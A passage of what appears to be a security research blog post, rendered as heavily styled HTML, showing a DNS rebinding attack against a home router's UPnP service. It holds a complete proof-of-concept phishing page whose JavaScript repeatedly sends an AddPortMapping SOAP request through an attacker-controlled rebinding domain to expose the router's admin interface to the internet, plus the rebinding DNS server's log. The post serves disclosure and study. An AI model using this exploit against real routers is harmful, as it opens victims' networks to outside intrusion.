51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><?xml version="1.0"?></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body> <u:AddPortMappingResponse xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> </u:AddPortMappingResponse></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"></s:Body></s:Envelope></span></pre></div><p style="text-align: justify;"><span style="font-family: inherit;">The previous SOAP POST request, according to the <b>AddPortMapping</b> action specification, exposes the administration web interface running on <b>192.168.1.1:80</b> externally on port <b>8989</b>, making then it accessible from Internet (if the <b>NewRemoteHost</b> is empty, its value is <b>0.0.0.0</b> by default).</span></p><div><p style="text-align: justify;">The requirements are satisfied and, therefore, we can perform a DNS Rebinding attack against the router and inject this custom rule into its port forwarding table. </p><p style="text-align: left;"></p><p style="text-align: justify;">The following HTML page was used as Proof of Concept of phishing page. The page was runned on localhost and the attacker domain in this case was <b>127-0-0-1.192-168-1-1.attacker.mindedsecurity.com</b>.</p><p style="text-align: justify;">The JavaScript code embedded inside the page continuously performs the <b>AddPortMapping</b> SOAP POST request via XHR to <b>http://127-0-0-1.192-168-1-1.attacker.mindedsecurity.com:5431</b>. </p><p></p></div><div><div class="CodeMirror-activeline" style="background-color: #333333; box-sizing: border-box; color: #b8bfc6; font-family: Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace; font-size: 14.4px; position: relative;"><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px; border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: inherit; font-family: inherit; font-size: inherit; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">html</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span></pre></div><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">head</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">script</span> <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">src</span>=<span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"jquery.min.js"</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">script</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">script</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">var</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">URL</span> <span class="cm-operator" style="box-sizing: border-box;">=</span> <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">'http://127-0-0-1.192-168-1-1.attacker.mindedsecurity:5431/control/WANIPConnection'</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">var</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">soapBody</span> <span class="cm-operator" style="box-sizing: border-box;">=</span><span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">'<?xml version="1.0"?> <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>8989</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>80</NewInternalPort><NewInternalClient>192.168.1.1</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>UPnP port mapping PoC</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>'</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">function</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">AddPortMapping</span>() {</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">jQuery</span>.<span class="cm-property" style="box-sizing: border-box;">ajax</span> ({</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-property" style="box-sizing: border-box;">url</span>: <span class="cm-variable" style="box-sizing: border-box;">URL</span>,</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-property" style="box-sizing: border-box;">type</span>: <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"POST"</span>,</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-property" style="box-sizing: border-box;">data</span>: <span class="cm-variable" style="box-sizing: border-box;">soapBody</span>,</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-property" style="box-sizing: border-box;">dataType</span>: <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"xml"</span>,</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-property" style="box-sizing: border-box;">contentType</span>: <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"text/xml; charset=utf-8"</span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> });</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">function</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">poll</span>() {</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">setTimeout</span>(<span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">function</span> () {</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">AddPortMapping</span>();</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">poll</span>();</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }, <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">180000</span>);</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> }</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">$</span>(<span class="cm-variable" style="box-sizing: border-box;">document</span>).<span class="cm-property" style="box-sizing: border-box;">ready</span>(<span class="cm-keyword" style="box-sizing: border-box; color: #c88fd0;">function</span> () {</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">poll</span>();</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> });</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">script</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">head</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">body</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"><</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">h1</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span>DNS Rebinding attack against vulnerable router - AddPortMapping<span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">h1</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">body</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;"></</span><span class="cm-tag" style="box-sizing: border-box; color: #7df46a;">html</span><span class="cm-tag cm-bracket" style="box-sizing: border-box; color: #999977;">></span></span></pre></div><div><br /></div><p style="text-align: justify;">The JavaScript code embedded in the HTML phishing page continuously performs the <b>NAT Injection </b>SOAP request via XHR, the attacker-controlled DNS server is hit multiple times and responds with the real IP address of the <i><b>127-0-0-1.192-168-1-1.attacker.mindedsecurity.com</b></i> domain, which in this case is <b>127.0.0.1</b> because the web server was runned locally. </p><p style="text-align: justify;">After a while, the DNS server returns the <b>192.168.1.1</b> IP address:</p><div style="text-align: justify;"><br /></div><div><div class="CodeMirror-activeline" style="background-color: #333333; box-sizing: border-box; color: #b8bfc6; font-family: Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace; font-size: 14.4px; position: relative;"><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px; border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: inherit; font-family: inherit; font-size: inherit; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">$ sudo python dns_server.py</span></pre></div><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">0 127-0-0-1.192-168-1-1.attacker.mindedsecurity.com -> 127.0.0.1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">1 127-0-0-1.192-168-1-1.attacker.mindedsecurity.com -> 127.0.0.1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">2 127-0-0-1.192-168-1-1.attacker.mindedsecurity.com -> 127.0.0.1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">3 127-0-0-1.192-168-1-1.attacker.mindedsecurity.com -> 127.0.0.1</span></pre><pre class="CodeMirror-line" role="presentation" 